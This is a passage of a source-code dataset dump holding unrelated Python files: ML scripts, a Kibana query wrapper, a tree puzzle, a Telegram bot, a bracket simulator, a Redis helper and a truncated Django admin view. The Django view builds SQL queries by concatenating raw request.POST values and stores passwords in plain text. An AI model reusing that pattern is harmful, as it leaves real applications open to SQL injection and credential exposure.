model_checkpoint_targetLayerName(model, checkpoint_dirpath, target_layer_names)\n\n\t# CliqueNet_S3\n\tmodel = cliquenet.build_cliquenet(input_channels=64, list_channels=[40, 80, 160, 160], list_layer_num=[6, 6, 6, 6], if_att= True) # block_num = 4 # S3\n\t# model = cliquenet.build_cliquenet(input_channels=64, list_channels=[36, 64, 100, 80], list_layer_num=[5, 6, 6, 6], if_att= True) # block_num = 4 # S0\n\tcheckpoint_dirpath = 'Results/model/build_cliquenet/s3_new/'\n\ttarget_layer_names = [\"fc\"]\n\tgrad_cam_CliqueNet_s3 = clique_model_checkpoint_targetLayerName(model, checkpoint_dirpath, target_layer_names)\n\n\t# Densenet161\n\tmodel = models.densenet161(pretrained=True)\n\tnum_ftrs = model.classifier.in_features\n\tmodel.classifier = torch.nn.Linear(num_ftrs, 37)\n\tcheckpoint_dirpath = 'Results/model/DenseNet/densenet161/'\n\ttarget_layer_names = [\"norm5\"]\n\tgrad_cam_Densenet_161 = model_checkpoint_targetLayerName(model,checkpoint_dirpath,target_layer_names)\n\n\n\tgrad_cams = {'Single_CNN': grad_cam_Single_CNN, 'densenet-40': grad_cam_Densenet_40,\n\t\t\t\t 'DenseNet-100':grad_cam_Densenet_100,'Densenet161':grad_cam_Densenet_161,'CliqueNet-S3':grad_cam_CliqueNet_s3}\n\n\t# Input (image)\n\timages = []\n\tval_dir_path = '/home/captain/Desktop/Graduation_Project/OXFORD_IIIT/database/data_breeds/val'\n\tfor val_breeds_dir_name in os.listdir(val_dir_path):\n\t\tval_breeds_dir_path = os.path.join(val_dir_path, val_breeds_dir_name)\n\t\tfor img_filename in os.listdir(val_breeds_dir_path):\n\t\t\timg_path = os.path.join(val_breeds_dir_path, img_filename)\n\t\t\timages.append(img_path)\n\n\tfrom visdom import Visdom\n\tviz = Visdom(env='Models-Grad-CAM')\n\timage_so_far = 0\n\tfor image_path in images:\n\n\t\tprint(image_so_far, image_path)\n\t\tif image_so_far == 100:\n\t\t\tbreak\n\n\t\timage_so_far += 1\n\t\timg = cv2.imread(image_path, 1) # : (224, 224, 3)\n\t\timg = np.float32(cv2.resize(img, (224, 224))) / 255 # : (224, 224, 3)\n\t\tinput = preprocess_image(img) # input torch.Size([1, 3, 224, 224])\n\n\t\t# If None, returns the map for the highest scoring category.\n\t\t# Otherwise, targets the requested index.\n\t\ttarget_index = None\n\n\t\tshow_origin_image(image_path)\n\t\tfor key_i in grad_cams:\n\t\t\tgrad_cam = grad_cams[key_i]\n\t\t\tmask = grad_cam(input, target_index) # __call__\n\t\t\tshow_cam_on_image(image_path, mask, key_i)\n\n\n\t\t# gb_model = GuidedBackpropReLUModel(model, use_cuda=args.use_cuda)\n\t\t# gb = gb_model(input, index=target_index)\n\t\t# utils.save_image(torch.from_numpy(gb*255), 'gb.jpg')\n\t\t#\n\t\t# cam_mask = np.zeros(gb.shape) # : (3, 224, 224)\n\t\t# for i in range(0, gb.shape[0]):\n\t\t# \tcam_mask[i, :, :] = mask\n\t\t#\n\t\t# # cam_gb = np.multiply(cam_mask, gb) # 点乘\n\t\t# cam_gb = np.multiply(mask, gb) # 点乘\n\t\t# utils.save_image(torch.from_numpy(cam_gb*255), 'cam_gb.jpg')\n\n\n\n\n\n\n\n\n\n","sub_path":"OXFORD_IIIT/grad-cam-models.py","file_name":"grad-cam-models.py","file_ext":"py","file_size_in_byte":13828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"70054619","text":"# coding: utf-8\n__author__ = 'Harald Floor Wilhelmsen'\n\n\nclass LogSolution:\n log_files = {}\n\n def __init__(self, log_files, standard_file_name):\n \"\"\"\n Initializes the log-object\n :param log_files: A list of *file*-names without extensions.\n Log-files with these names will be created in /var/log.\n \"\"\"\n for file_name in log_files:\n self.log_files[file_name] = '/var/log/{}.log'.format(file_name)\n self.log_files['standard_log_file'] = '/var/log/{}.log'.format(standard_file_name)\n\n def log(self, entry, log_file_name, print_entry=True):\n if print_entry:\n print(entry)\n with open(self.log_files[log_file_name], 'a') as log_file:\n log_file.write(entry + '\\n')\n","sub_path":"userscripts/tihldelib/logsolution.py","file_name":"logsolution.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"169003189","text":"#!/usr/bin/python\n# encoding: utf-8\n\nimport random\nimport torch\nfrom torch.autograd import Variable\n\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import sampler\nimport torchvision.transforms as transforms\nimport six\nimport sys\nfrom PIL import Image\nimport numpy as np\nfrom data_generator import FakeTextDataGenerator\nimport os\n\n\nwith open('../gen_data/poem_pure.txt','r',encoding='utf-8') as text:\n poem = [i.split('\\n')[0] for i in text.readlines()]\n poem_len = len(poem)-1\n\nwith open('../gen_data/idiom_pure.txt','r',encoding='utf-8') as text:\n idiom = [i.split('\\n')[0] for i in text.readlines()]\n idiom_len = len(idiom)-1\n\nfonts_list = os.listdir('../gen_data/TextRecognitionDataGenerator/fonts')\n\npics = os.listdir('../gen_data/TextRecognitionDataGenerator/img')\nbgs = []\nfor i in pics:\n bgs.append(Image.open('../gen_data/TextRecognitionDataGenerator/img/'+i))\n\n\n# 从文字库中随机选择n个字符\ndef sto_choice_from_info_str(quantity=10):\n if random.random() > (4/quantity):\n text = poem[random.randint(0,poem_len)]\n start = random.randint(0, len(text) - quantity)\n return text[start:start+random.randint(int(quantity*0.8),quantity)]\n else:\n return idiom[random.randint(0,idiom_len)]\n\nclass genDataset(Dataset):\n def __init__(self, transform=None, target_transform=None):\n self.nSamples = 1000000\n self.transform = transforms.Compose([transforms.ToTensor()])\n self.target_transform = target_transform\n\n def __len__(self):\n return self.nSamples\n\n def __getitem__(self, index):\n assert index <= len(self), 'index range error'\n\n text = sto_choice_from_info_str(10)\n\n font = random.sample(fonts_list, 1)[0]\n font = os.path.join('../gen_data/TextRecognitionDataGenerator/fonts', font)\n\n size = 48\n width = size * 10\n\n skewing_angle = random.randint(0, 5)\n\n blur = random.random() / 2\n\n background_type = 3\n\n distorsion_type = random.randint(0, 2)\n distorsion_orientation = random.randint(0, 2)\n\n alignment = random.randint(0, 2)\n\n text_color = '#000000'\n\n orientation = 1\n space_width = 1\n\n bg = random.sample(bgs,1)[0]\n\n img = FakeTextDataGenerator.generate(text,font,size,skewing_angle,background_type,\n distorsion_type,distorsion_orientation,width,alignment,text_color,orientation,space_width,bg,blur)\n\n # img = self.transform(img)\n\n label = text\n\n if self.target_transform is not None:\n label = self.target_transform(label)\n\n return (img, label)\n\n\nclass lmdbDataset(Dataset):\n\n def __init__(self, root=None, transform=None, target_transform=None):\n if not self.env:\n print('cannot creat lmdb from %s' % (root))\n sys.exit(0)\n\n with self.env.begin(write=False) as txn:\n\n str = 'num-samples'\n nSamples = int(txn.get(str.encode()))\n self.nSamples = nSamples\n\n self.transform = transform\n self.target_transform = target_transform\n\n def __len__(self):\n return self.nSamples\n\n def __getitem__(self, index):\n assert index <= len(self), 'index range error'\n index += 1\n with self.env.begin(write=False) as txn:\n img_key = 'image-%09d' % index\n imgbuf = txn.get(img_key.encode())\n\n buf = six.BytesIO()\n buf.write(imgbuf)\n buf.seek(0)\n try:\n img = Image.open(buf).convert('L')\n except IOError:\n print('Corrupted image for %d' % index)\n return self[index + 1]\n\n if self.transform is not None:\n img = self.transform(img)\n\n label_key = 'label-%09d' % index\n label = txn.get(label_key.encode())\n\n if self.target_transform is not None:\n label = self.target_transform(label)\n\n return (img, label)\n\n\nclass resizeNormalize(object):\n\n def __init__(self, size, interpolation=Image.BILINEAR):\n self.size = size\n self.interpolation = interpolation\n self.toTensor = transforms.ToTensor()\n\n def __call__(self, img):\n img = img.resize(self.size, self.interpolation)\n img = self.toTensor(img)\n img.sub_(0.5).div_(0.5)\n return img\n\n\nclass randomSequentialSampler(sampler.Sampler):\n\n def __init__(self, data_source, batch_size):\n self.num_samples = len(data_source)\n self.batch_size = batch_size\n\n def __iter__(self):\n n_batch = len(self) // self.batch_size\n tail = len(self) % self.batch_size\n index = torch.LongTensor(len(self)).fill_(0)\n for i in range(n_batch):\n random_start = random.randint(0, len(self) - self.batch_size)\n batch_index = random_start + torch.range(0, self.batch_size - 1)\n index[i * self.batch_size:(i + 1) * self.batch_size] = batch_index\n # deal with tail\n if tail:\n random_start = random.randint(0, len(self) - self.batch_size)\n tail_index = random_start + torch.range(0, tail - 1)\n index[(i + 1) * self.batch_size:] = tail_index\n\n return iter(index)\n\n def __len__(self):\n return self.num_samples\n\n\nclass alignCollate(object):\n\n def __init__(self, imgH=32, imgW=256, keep_ratio=False, min_ratio=1,cuda=None):\n self.imgH = imgH\n self.imgW = imgW\n self.keep_ratio = keep_ratio\n self.min_ratio = min_ratio\n self.cuda = cuda\n\n def __call__(self, batch):\n images, labels = zip(*batch)\n imgH = self.imgH\n imgW = self.imgW\n if self.keep_ratio:\n ratios = []\n for image in images:\n w, h = image.size\n ratios.append(w / float(h))\n ratios.sort()\n max_ratio = ratios[-1]\n imgW = int(np.floor(max_ratio * imgH))\n imgW = max(imgH * self.min_ratio, imgW) # assure imgH >= imgW\n\n transform = resizeNormalize((imgW, imgH))\n images = [transform(image) for image in images]\n images = torch.cat([t.unsqueeze(0) for t in images], 0)\n return images, labels\n","sub_path":"CRNN/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":6246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"320206996","text":"\"\"\"\nRun queries against Kibana's elasticsearch\n@see http://elasticsearch-py.readthedocs.org/en/master/\n\"\"\"\nimport json\nimport logging\nimport time\n\nfrom datetime import datetime\nfrom dateutil import tz\n\nfrom elasticsearch import Elasticsearch\n\nimport config\n\n\nclass KibanaError(Exception):\n pass\n\n\nclass Kibana(object):\n # give 5 seconds for all log messages to reach logstash and be stored in elasticsearch\n SHORT_DELAY = 5\n\n # seconds in 24h used to get the es index for yesterday\n DAY = 86400\n\n \"\"\" Interface for querying Kibana's storage \"\"\"\n def __init__(self, since=None, period=900):\n \"\"\"\n :arg since: UNIX timestamp data should be fetched since\n :arg period: period (in seconds) before now() to be used when since is empty (defaults to last 15 minutes)\n \"\"\"\n self._es = Elasticsearch(hosts=config.ELASTICSEARCH_HOSTS)\n self._logger = logging.getLogger('kibana')\n\n # if no timestamp provided, fallback to now() in UTC\n now = int(time.time())\n\n if since is None:\n since = now - period\n else:\n since += 1\n self._logger.info(\"Using provided {:d} timestamp as since ({:d} seconds ago)\".format(since, now - since))\n\n self._since = since\n self._to = now - self.SHORT_DELAY # give logs some time to reach Logstash\n\n # Elasticsearch index to query\n # from today and yesterday\n self._index = ','.join([\n self.format_index(now-self.DAY),\n self.format_index(now),\n ])\n\n self._logger.info(\"Using {} indices\".format(self._index))\n self._logger.info(\"Querying for messages from between {} and {}\".\n format(self.format_timestamp(self._since), self.format_timestamp(self._to)))\n\n @staticmethod\n def format_index(ts):\n # ex. logstash-2014.07.08\n tz_info = tz.tzutc()\n return \"logstash-%s\" % datetime.fromtimestamp(ts, tz=tz_info).strftime('%Y.%m.%d')\n\n @staticmethod\n def format_timestamp(ts):\n \"\"\"\n Format the UTC timestamp for Elasticsearch\n eg. 2014-07-09T08:37:18.000Z\n\n @see https://docs.python.org/2/library/time.html#time.strftime\n \"\"\"\n tz_info = tz.tzutc()\n return datetime.fromtimestamp(timestamp=ts, tz=tz_info).strftime(\"%Y-%m-%dT%H:%M:%S.000Z\")\n\n def _get_timestamp_filer(self):\n return {\n \"range\": {\n \"@timestamp\": {\n \"from\": self.format_timestamp(self._since),\n \"to\": self.format_timestamp(self._to)\n }\n }\n }\n\n def _search(self, body, limit=0):\n \"\"\"\n Perform the search and return raw rows\n\n :arg body: query JSON body\n :arg limit: how many rows to return\n :return: raw rows\n \"\"\"\n body.setdefault(\"filter\", self._get_timestamp_filer())\n body.setdefault(\"size\", limit)\n\n self._logger.debug(\"Running {} query (limit set to {:d})\".format(json.dumps(body), body.get('size', 0)))\n\n data = self._es.search(\n index=self._index,\n body=body,\n )\n\n if data['timed_out'] is True:\n raise KibanaError(\"The query timed out!\")\n\n rows = [entry['_source'] for entry in data['hits']['hits']]\n\n self._logger.info(\"{:d} rows returned in {:d} ms\".format(len(rows), data['took']))\n return rows\n\n def get_rows(self, match, limit=10):\n \"\"\"\n Returns raw rows that matches given query\n\n :arg match: query to be run against Kibana log messages (ex. {\"@message\": \"Foo Bar DB queries\"})\n :arg limit: the number of results (defaults to 10)\n \"\"\"\n body = {\n \"query\": {\n \"match\": match,\n }\n }\n\n return self._search(body, limit)\n\n def query_by_string(self, query, limit=10):\n \"\"\"\n Returns raw rows that matches the given query string\n\n :arg query: query string to be run against Kibana log messages (ex. @message:\"^PHP Fatal\").\n :arg limit: the number of results (defaults to 10)\n \"\"\"\n body = {\n \"query\": {\n \"query_string\": {\n \"query\": query,\n }\n }\n }\n\n return self._search(body, limit)\n\n def get_to_timestamp(self):\n \"\"\" Return the upper time boundary to returned data \"\"\"\n return self._to\n","sub_path":"wikia/common/kibana/kibana.py","file_name":"kibana.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"232091353","text":"\"\"\" perfect tree \"\"\"\n\nfrom binary_tree import Btree, print_with_levels\n\n# Traverse tree with DFS, creates a dictionary with number of nodes\n# per level (npl) and then compute total number of nodes\ndef max_perfect_size(node):\n # BFS traverse and fill npl dictionary\n npl = {} # nodes per level\n queue = [(node, 0)]\n while len(queue) > 0:\n next_node, level = queue.pop(0)\n if level not in npl:\n # Stop traversing the tree if a level is not fully filled\n if level > 0 and npl[level-1] != 2 ** (level-1):\n break\n npl[level] = 1\n else:\n npl[level] += 1\n if next_node.left:\n queue.append((next_node.left, level + 1))\n if next_node.right:\n queue.append((next_node.right, level + 1))\n\n # Find number of nodes based on the npl dictionary\n return sum(node_nr for level, node_nr in npl.items()\n if 2 ** level == node_nr)\n\n# Recursively traverse the tree and compute for every node\ndef solution(T):\n def recursive(node):\n if node is None:\n return\n else:\n node_max_perfect = max_perfect_size(node)\n if node_max_perfect > largest[0]:\n largest[0] = node_max_perfect\n recursive(node.left)\n recursive(node.right)\n \n # Using \"largest\" variable as a one element array to keep the same\n # reference after assigning new max inside recursive method\n largest = [0]\n recursive(T)\n return largest[0]\n\n\nif __name__ == '__main__':\n t = Btree()\n t.add(1)\n assert solution(t.root) == 1\n t.add(2)\n assert solution(t.root) == 1\n\n lst = list(range(1,16))\n t = Btree.from_ordered_list(lst)\n assert solution(t.root) == 15\n t.delete(15)\n assert solution(t.root) == 7\n t.delete(14)\n assert solution(t.root) == 7\n t.delete(1)\n assert solution(t.root) == 7\n t.delete(2)\n t.delete(3)\n assert solution(t.root) == 3\n\n print(\"Tests passed!\")","sub_path":"binary_tree/perfect_tree.py","file_name":"perfect_tree.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"150127201","text":"#! /usr/bin/env python\nimport sys\nimport xml.etree.ElementTree as et\n\nizq = 'izqNodo'\nder = 'derNodo'\nlists = et.parse(sys.argv[1]).getroot()[0].findall('facade.tree')\nfile = open((sys.argv[1]).split('.')[0]+'.txt','w')\nfor tree in lists:\n\tsons = tree.iter()\n\tfacade = sons.next()\n\tif len(facade.getchildren()):\n\t\tders = []\n\t\tcadena = '('\n\t\tcerrar = 1\n\t\tfor son in sons:\n\t\t\ttag = son.tag\n\t\t\tif tag == izq:\n\t\t\t\tcadena+='('\n\t\t\t\tfor i in range(len(ders)):\n\t\t\t\t\tders[i]+=1\n\t\t\t\tcerrar+=1\n\t\t\telif tag == der:\n\t\t\t\tif len(ders):\n\t\t\t\t\tult = ders.pop()\n\t\t\t\t\tcadena += ')'*ult\n\t\t\t\t\tfor i in range(len(ders)):\n\t\t\t\t\t\tders[i]-=ult\n\t\t\t\t\tcerrar-=ult\n\t\t\t\tcadena+=')('\n\t\t\tif len(son.findall(der)):\n\t\t\t\tders+=[0]\n\t\tcadena+=')'*cerrar\n\t\tfile.write(cadena+'\\n')\n\telse:\n\t\tfile.write('-\\n')\n\nfile.close()\n","sub_path":"treesToParentheses.py","file_name":"treesToParentheses.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"69184178","text":"import socket\n \ntarget_host = '127.0.0.1' #这里是服务器端的ip\ntarget_port = 9999\n \n#建立一个socket对象\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n \n#连接客户端\nclient.connect((target_host, target_port))\n \nwhile True:\n#发送一些数据\n sendmsg = input(\"请输入:\")\n if sendmsg == 'over':\n print(\"Game over!\")\n break\n sendmsg = sendmsg\n client.send(sendmsg.encode(\"utf-8\"))\n response = client.recv(2048)\n print(response.decode(\"utf-8\"))\n#client.close()\n","sub_path":"廖Py教程/py/18.网络编程/tcp_client.py","file_name":"tcp_client.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"194261291","text":"import logging\n\nfrom aiogram import types\nfrom aiogram.types import ReplyKeyboardMarkup, KeyboardButton, ContentType\n\nfrom server import dp\nfrom state import get_state\n\nlog_i = logging.info\nlog_w = logging.warning\n\n\n\n@dp.message_handler(content_types=ContentType.PHOTO)\nasync def text_valid(message: types.Message):\n state = get_state(message.from_user.id)\n log_i(\"WORK ?\")\n state.set_photo(message.photo[-1].file_id)\n if len(state.get_photo()) > 3:\n await message.answer(\"Воспользуйтесь командой /present_task для демонстрации \")\n\n@dp.message_handler(content_types=ContentType.TEXT)\nasync def text_valid(message: types.Message):\n state = get_state(message.from_user.id)\n log_i(f\"{state.__class__} ---{state.state}\")\n if \"text\" == state.state:\n state.set_text(message.text)\n markup = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)\n markup.add(KeyboardButton(\"Отправить свою локацию 🗺️\", request_location=True))\n markup.add(\"Вести вручную\")\n await message.reply(\"Ведите геопазицию\", reply_markup=markup)\n elif message.text == \"Вести вручную\":\n pass\n elif state.state == \"geo\":\n state.set_geo_link(message.text, 'text')\n await message.answer(\"Загрузите фото.Не более 3\")\n # else:\n # await message.answer(\"Произошел сбой в регистрации заявки для сброса заявки используйте /new_task\")\n\n\n@dp.message_handler(content_types=ContentType.LOCATION)\nasync def text_valid(message: types.Message):\n state = get_state(message.from_user.id)\n if state == 'geo':\n state.set_geo_link(message.location, \"cord\"),\n await message.answer(\"Загрузите фото.Не более 3\\n По окончанию загрузки воспользуйтесь командой /present_task\")\n","sub_path":"bot/free_bot_telegramm/handler/common_type.py","file_name":"common_type.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"620363609","text":"from __future__ import absolute_import\nimport functools\n\nfrom tornado import gen\n\nfrom appnado import exceptions\n\n\n# This decorator must be before @gen.coroutine\ndef handle_exceptions(func=None):\n def the_decorator(func):\n @gen.coroutine\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n try:\n yield func(self, *args, **kwargs)\n except exceptions.AppnadoException as ex:\n self.logger.error(ex)\n self.build_response(ex)\n except Exception as ex: # pylint: disable=broad-except\n self.logger.error(ex)\n self.build_response(ex)\n\n return wrapper\n\n if func:\n return the_decorator(func)\n else:\n return the_decorator\n","sub_path":"appnado/applications/http/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"506355942","text":"import pandas as pd\nimport random\nimport math\n\n\nclass Team:\n # Class for Team object\n \n def __init__(self, id, name):\n self.id = id\n self.name = name\n self.defeated_teams = []\n\n def __str__(self):\n return self.name\n\n def __repr__(self):\n return self.name\n\n\n# Following lines are optional as the files have been provided.\n# read raw csv file for teams and only pull the first two columns (id, team_name)\nbracket_df = pd.read_csv('bracket-00.csv')\nbracket_df = bracket_df[['team_id', 'team_name']]\n# Grab only the first 64 rows - we need number of teams to be a power of 2.\nbracket_df = bracket_df.loc[:63]\nbracket_df.to_csv('teams.csv', header=False, index=False)\n\n\ndef create_teams(file):\n# Read from the teams.csv file and populate the teams list with Team objects.\n with open(file) as f:\n for line in f:\n split_line = line.split(',')\n teams.append(Team(split_line[0], split_line[1]))\n return teams\n\ndef generate_bracket(teams):\n # Generate bracket from the teams list the bracket list will be a list\n # of randomly generated tuples between the teans objects such as \n # bracket = [(Weber State. Gonzaga), (Baylor, Nebraska)]\n\n # Number of 'games' to be played as if there are 64 teams, there's going to\n # be teams/2 games. In this example 32 games.\n iterations = len(teams) // 2\n bracket = []\n\n for i in range(iterations):\n team_1 = random.choice(teams)\n teams.remove(team_1)\n team_2 = random.choice(teams)\n teams.remove(team_2)\n\n bracket.append((team_1, team_2))\n return bracket\n\ndef play_tournament(bracket, teams):\n # Function to play out the tournament by providing an initial bracket list\n \n # num_rounds will equal the log base 2 of the current number of teams i.e.\n # the number of \"levels\" in a binary tree.\n num_rounds = int(math.log(len(teams), 2))\n #print(num_rounds)\n\n for i in range(num_rounds):\n if len(winners) > 0:\n # If winners list is currently populated i.e. past the first round\n bracket = generate_bracket(winners)\n else:\n # Generate the bracket if no games have been played yet.\n bracket = generate_bracket(teams)\n\n for match in bracket:\n # Iterate through the match in the brackets list. Match is in the \n # form of a tuple of Team objects i.e. (Gonzaga, Witchita State)\n\n # generates True/False based on random. If True, first team in the \n # tuple wins, else the second team wins.\n selection = random.random() >= 0.5\n # Keep track of the winner and loser\n if not selection:\n winner = match[0]\n loser = match[1]\n else:\n winner = match[1]\n loser = match[0]\n \n # Loser gets appended to the winning Team objects defeated_teams list\n winner.defeated_teams.append(loser)\n winners.append(winner)\n\ndef is_bracket_complete(teams, winners):\n # Function to check if the bracket has been finished playing out.\n \n # If teams list is exhausted and there is a single winner in winners list\n # then the bracket is complete\n return ('Bracket is complete!' if (len(teams) == 0 and len(winners) == 1) \n else 'Bracket is incomplete!')\n\ndef find_champion(teams, winners):\n # Function to return the winner of the tournament\n\n return (f'Your champion is { winners[0] }' if len(teams) == 0 and \n len(winners) == 1 else 'No champion yet! Play out the tournament!')\n\ndef champions_path_to_victory(winners):\n # Function that returns the champions defeated teams list in a f-string\n\n if len(winners) > 0:\n champion = winners[0]\n else:\n return('No champion!')\n\n champion_defeated_teams = [team.name for team in champion.defeated_teams]\n return (f'Your champion ({champion})\\'s path of destruction is ' + \n '-> '.join(champion_defeated_teams))\n\n \n# Initial lists that we need.\nteams = []\nbracket = []\nwinners = []\nteams = create_teams('teams.csv')\nplay_tournament(bracket, teams)\n\n#print(len(winners))\n#print(len(teams))\n#print(winners[0].defeated_teams)\n#print('Winner is ' + str(winners[-1]))\n#print(f'Winner {winners[-1]} defeated ' + str(winners[-1].defeated_teams) + \n# ' on their road to the championship!')\n\nprint(is_bracket_complete(teams, winners))\ntest_winners = []\nprint(is_bracket_complete(teams, test_winners))\ntest_teams = [Team(1, 'TEST SCHOOL')]\nprint(is_bracket_complete(test_teams, winners))\nprint(find_champion(teams, winners))\nprint(champions_path_to_victory(winners))\nprint(champions_path_to_victory(test_winners))","sub_path":"4 - March Madness/bracket.py","file_name":"bracket.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"249553345","text":"import random as r\n\nnum = r.randint(1,100)\nguessed = False\nguess = input(\"Guess my number (1-100):\")\n\nwhile not guessed:\n numberChoosen = int(guess)\n if(numberChoosen == num):\n guessed = True\n else:\n if (numberChoosen > num):\n print(\"Lower\")\n else:\n print(\"Higher\")\n guess = input(\"Next guess:\")\n\nprint(\"you guessed correctly!\")\n","sub_path":"numberguesser.py","file_name":"numberguesser.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"34512283","text":"import logging\nimport sys\n\n# region Logging\ndef get_logger():\n logger = logging.getLogger('artemis')\n log_handler = logging.StreamHandler(stream=sys.stdout)\n formatter = logging.Formatter('[%(asctime)s - %(levelname)-8s - %(module)-20s:%(lineno)4s - %(funcName)-45s] - %(message)s')\n formatter.default_msec_format = '%s.%03d'\n log_handler.setFormatter(formatter)\n if not logger.handlers:\n logger.addHandler(log_handler)\n logger.setLevel(logging.DEBUG)\n logger.propagate = False\n return logger\n# endregion\n","sub_path":"utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"27954786","text":"import redis\n\n# Redis Key\n\n# hash object\nOVERALL_CAPACITY = 'capacity'\nVOLUME_STATUS = 'status'\nVOLUME_USAGE = 'usage'\nVOLUME_PREFIX = 'volume:'\nSNAPSHOT_PREFIX = 'snapshot:'\nBRICK_PREFIX = 'brick:'\nVOLUME_NFS = 'nfs'\nVOLUME_SAMBA = 'samba'\nVOLUME_ISCSI = 'iscsi' \nVOLUME_SWIFT = 'swift'\n\n# set object\nVOLUME_NAMES = 'volume:names'\nNETWORKIO_IN = 'network_io_in:names'\nNETWORKIO_OUT = 'network_io_out:names'\n\n\n# single object\nCLUSTER_DISKS = 'cluster:disks'\nCLUSTER_LIST = 'cluster:list'\nCLUSTER_RESOURCE = 'cluster:resource'\n\n# list object\nMEMORY_USAGE_PREFIX = 'memory_usage:' # memory_usage:192.168.1.150\nCPU_USAGE_PREFIX = 'cpu_usage:' # cpu_usage:192.168.1.150:1 cpu_usage:192.168.1.150:2 etc\nREAD_SPEED_PREFIX = 'read_speed:'\nWRITE_SPEED_PREFIX = 'write_speed:'\nDISKWRITE = 'diskio_write:'\nDISKREAD = 'diskio_read:'\nDISKWRITEALL = 'disk_writes:'\nDISKREADALL = 'disk_reads:'\nDISK_NAME_WRITE = 'disk_name_write:'\nDISK_NAME_READ = 'diskname_read:'\nNETWORKIO_NAME_IN_INIT = 'network_machine_in_init:'\nNETWORKIO_NAME_OUT_INIT = 'network_machine_out_init:'\nNETWORKIO_IN_SUM_INIT = 'networkio_in_sum_init:'\nNETWORKIO_OUT_SUM_INIT = 'networkio_out_sum_init:'\n\n\n# Redis Value\nVOLUME_STATUS_STARTED = 'Started'\nVOLUME_STATUS_STOPPED = 'Stopped'\nVOLUME_CAPACITY = 'capacity'\nVOLUME_USAGE = 'usage'\nTIMESTAMP = \"timestamp\"\nTEST = \"test\"\nDATA = \"data\"\nTIME = \"time\"\n\n\n# This class is wrapper for a redis instance\nclass Redis:\n r = redis.StrictRedis(host='localhost', port=6379, db=0)\n\n @staticmethod\n def set(name, value):\n Redis.r.set(name, value)\n\n @staticmethod\n def psetex(name, time, value):\n Redis.r.psetex(name, time, value)\n\n @staticmethod\n def setex(name, time, value):\n Redis.r.setex(name, time, value)\n\n @staticmethod\n def pttl(name):\n Redis.r.pttl(name)\n\n @staticmethod\n def ttl(name):\n Redis.r.ttl(name)\n\n @staticmethod\n def get(name):\n return Redis.r.get(name)\n\n @staticmethod\n def delete(name):\n Redis.r.delete(name)\n\n @staticmethod\n def hset(name, key, value):\n Redis.r.hset(name, key, value)\n\n @staticmethod\n def hmset(name, mapping):\n Redis.r.hmset(name, mapping)\n\n @staticmethod\n def hget(name, key):\n return Redis.r.hget(name, key)\n\n @staticmethod\n def hgetall(name):\n return Redis.r.hgetall(name)\n\n @staticmethod\n def sadd(name, value):\n Redis.r.sadd(name, value)\n\n @staticmethod\n def sget(name):\n return Redis.r.smembers(name)\n\n @staticmethod\n def srem(name, key):\n return Redis.r.srem(name, key)\n\n @staticmethod\n def lrem(name, value,num):\n Redis.r.lrem(name, value,num)\n\n # append to list\n @staticmethod\n def lpush(name, key):\n Redis.r.rpush(name, key)\n\n @staticmethod\n def lrange(name, start, end):\n return Redis.r.lrange(name, start, end)\n\n\n @staticmethod\n def lpop(name):\n return Redis.r.lpop(name)\n","sub_path":"src/lib/glfs-web/app/redis_util.py","file_name":"redis_util.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"316617087","text":"import random\r\nfrom datetime import date\r\nfrom http.client import HTTPResponse\r\n\r\nfrom django.http import *\r\nfrom django.shortcuts import *\r\nfrom math import *\r\n\r\nfrom django.views.decorators.csrf import *\r\nfrom django.core.files.storage import *\r\nfrom pymysql import *\r\nimport http.client\r\n\r\ndef random_with_N_digits(n):\r\n range_start=10**(n-1)\r\n range_end=(10**n)-1\r\n from random import randint\r\n return randint(range_start,range_end)\r\n\r\ndef addadmin(request):\r\n return render(request,\"addadmin.html\")\r\n\r\n\r\n@csrf_exempt\r\ndef add(request):\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n q=\"select * from admin where email='\"+request.POST[\"email\"]+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(q)\r\n result=cr.fetchone()\r\n if result:\r\n # d={\"message\":\"Email already exists\"}\r\n return HttpResponse(\"fail\")\r\n else:\r\n s = \"insert into admin values('\"+request.POST[\"email\"]+\"','\"+request.POST[\"password\"]+\"','\"+request.POST[\"type\"]+\"',\"+request.POST[\"mobile\"]+\")\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n # d={\"message\":\"Admin added successfully\"}\r\n return HttpResponse(\"success\")\r\n\r\ndef viewadmin(request):\r\n if \"adminemail\" in request.session:\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from 